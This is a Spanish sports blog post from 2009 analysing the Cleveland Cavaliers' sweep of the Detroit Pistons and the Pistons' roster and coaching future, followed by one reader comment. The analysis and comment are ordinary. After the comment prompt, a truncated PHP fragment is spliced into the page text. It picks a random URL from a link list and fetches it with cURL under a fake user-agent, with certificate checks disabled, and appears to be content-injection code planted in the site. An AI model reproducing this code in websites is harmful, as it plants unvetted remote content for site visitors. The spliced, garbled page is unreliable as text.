Cavaliers 4 – Pistons 0: El fin de un proyecto

27 de April de 2009 por TheDeerHunter

No sacaremos pecho por acertar de pleno en el pronóstico pues tampoco hacía falta ser ningún visionario para lograrlo. De hecho, no tiene demasiado sentido analizar una eliminatoria que realmente ni siquiera se ha disputado. Lebron ha concluído así el trabajo que empezó exactamente hace tres años. El sometimiento más absoluto de una de las potencias más importantes del Este durante la última década. Otro peldaño más en su ascenso hacia el Valhalla.

Mejor analizaremos a los propios Pistons, las causas que les han llevado a esta desastrosa situación y el futuro que les depara.

El tiempo no pasa en balde y todos sabíamos que era un momento que tenía que llegar. Se trataba de evitar una reconstrucción traumática y diría que en líneas generales se avanzaba en el buen camino. ¿Qué circunstancias han provocado que se haya truncado esta renovación?

En mi opinión han sido dos los motivos:

El fichaje de Michael Curry tras el buen hacer de Saunders. Entiendo que Dumars tratara de dar un golpe de timón para iniciar la supuesta renovación y el nuevo técnico parecía una buena opción de cara a mantener a los “Pretorianos” tranquilos. Sin embargo, más allá de los malos resultados, su peor fracaso ha sido el estancamiento del principal activo de los Pistons hoy por hoy: Maxiell, Amir Johnson, Afflalo y en menor medida de Stuckey. Y su único éxito Will Bynum, tarde, mal y de rebote.

El asunto Iverson vs Billups, difícil que hubiera salido más rana. No deberíamos olvidar que el contrato de Iverson es un expiring de oro para el cambio generacional que se buscaba en Detroit y que quien más y quien menos ya se imaginaba que era difícil que cuajara en un proyecto tan basado en el colectivo y la disciplina como lo había sido éste tradicionalmente. Lo peor, dejando de lado lo impopular del asunto, es quizás haber dado el banderazo de salida a la disolución de uno de los proyectos con más solera. Quizás haya sido precisamente esa evidencia el motivo del rápido deterioro de hombres como Rasheed o Prince y como consecuencia la gravísima devaluación de los principales transferibles. Lo que vas a ganar con el expiring puedes perderlo a través de algunos contratos caros que restan por cumplir o por movimientos que no puedas llegar a hacer. Uno se pregunta si era Billups el más indicado para un posible traspaso o si era el único con el que se podía realizar un movimiento de estas características.

A partir de aquí, si asumimos de pleno la reconstrucción, no parece que sea de las más difíciles posibles. Liberarán sí o sí 22 kilos de Iverson y, probablemente, gran parte o todos de los 14 de Rasheed. Yo sí renovaría a McDyess y Maxiell, aunque supongo que ambas estarán condicionadas a la marcha de Curry. Sea como sea, tendrán que rehacer el juego interior por completo.

Desconocemos exactamente cual es la situación de Tayshaun Prince y el motivo de su nefasto rendimiento este final de temporada. Son alrededor de 10 millones por año que son absurdos bajo el prisma actual. Sin embargo es un jugador que estando bien cabe perfectamente en cualquier proyecto.

Del último “sagrado”, RIP Hamilton, la intención de la franquicia debería de ser mantenerle pero no tenemos claro si esto coincidirá con el deseo del jugador.

Finalmente apostaría por la destitución de Curry. No creo que haya ningún criterio objetivo a su favor para mantenerle en el cargo.

Comenta

Un comentario a esta entrada

  1. Txusma dice:
    #1

    Por ahi se comenta q Detroit no renovara a Wallace ni a McDyess y con todo el dinero liberado (sumandole problablemente el de Iverson) ir a por Carlos Boozer. Ademas podrian traspasar a Prince mas algun de las 4 rondas que tienen. Como dices, no les faltan opciones y sus seguidores tampoco han de mirar el futuro con excesiva preocupacion. Dumars monto un equipo campeon en una sitacion mas complicada que esta asi que habra q darle un voto de confianza.
    Lo q yo me pregunto es q equipo se hara con los servicios de Iverson (comenzara a buscar el anillo descaradamente?) y a q precio, viendo el contexto de crisis en el q nos movemos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>